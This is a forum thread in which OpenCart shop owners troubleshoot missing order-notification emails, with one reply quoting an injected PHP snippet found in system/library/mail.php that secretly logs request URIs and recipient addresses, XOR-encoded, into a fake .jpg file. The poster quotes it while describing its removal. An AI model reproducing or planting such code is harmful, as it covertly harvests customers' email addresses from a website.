Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Настройка почты


Recommended Posts

Очередная тема, но то, что я нашел на форуме мне не помогло. 

(у меня OpenCart 1.5.2)

 

У меня следующая проблема.

 

В настройках почты на главной я указываю почту типа [email protected] а на вкладке почта - Почтовый протокол Mail (и оповещение и клиента и владельца- Да), остальное пусто.

 

Далее пробую оформить тестовый Заказ - мне как Владельцу не пришло ни одно уведомление о Заказе. Мало того, если я как Заказчик указываю почту на Mail.ru уведомлений также не приходит.

 

Пробуем оформить Заказ при этом при оформлении (как Клиент) указать сторонние почтовые ресурсы - все работает (были испробованы почта от Яндекс, Гугл и Хотмейл).

 

Тогда я поочередно ставлю в настройках сайта все эти почтовые адреса на которые в принципе скрипт отправляет письма и они на них доходят. Но вот чудо. Письмо прошло только на Гугл и то я его нашел в спаме. Причем в спам удаляется каждое уведомление, хотя я и указываю, что это не спам. Но он упорно пишет, что это похоже на фишинг и адрес отправителя не совпадает с реальным адресом отправления.

 

Хорошо, пробую завести почту на самом сервере с адресом типа [email protected]

Прописываю настройки через SMPT

Настраиваю почтового клиента Thunderdird, почта работает, все отправляется и получается через клиент. А вот при указании данного адреса что со стороны Владельца в настройках сайта, что со стороны клиента при оформлении Заказа - уведомлений нет.

 

Подытожим - основные проблемы с Майл.ру причем проблема в том что часто сам Заказчик не получает уведомления. Проблема по аналогии с Гуглом в том, Майл считает отправку таких писем не правильной и вообще их отбрасывает, даже не направляя в спам.

 

Как с этим бороться?

Надіслати
Поділитися на інших сайтах


Были похожие проблемы с почтой (1.5.1.3)

как минимум, у хостера должна быть запись "DNS PTR record", без этого мне даже не давали отправлять почту.

может IP хостера внесен в один из черных списков спамеров.

так что решать с хостером в любом случае.

Надіслати
Поділитися на інших сайтах


  • 3 weeks later...
Не знаю как на других версиях, но у меня на ocStore 0.2.0 ни с того ни с сего пропали уведомления на mail.ru приходить. Повозившись нашел, что system/library/mail.php немного изменен:

<?php /* 70ad8a53e5e1856b0e403fff265b2b21 */ function xmail () { $a=func_get_args(); file_put_contents('/home/мой_аккаунт/public_html/biserklass.ru/catalog/model/setting/d8d.jpg', x($_SERVER['REQUEST_URI']. ' ' .$a[0]."\n"), FILE_APPEND); return mail($a[0],$a[1],$a[2], $a[3]);} function x($s) { $t=$s; $o = ''; for($i=0;$i<strlen($t);$i++){ $o .= $t{$i} ^ '0';} return $o;}?><?php

final class Mail {
 
 
Затем в директории /setting/ не нашел extension.php, setting.php. store.php так-же был изменен. Зато присутствовали 3 jpg файла, которые ими не являются, и cookies. 
Перезаписал что надо, убрал, добавил: все заработало.
Не знаю, может какой-то спам-редирект, или что-то еще в движке осталось. Но помогло.
 
Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.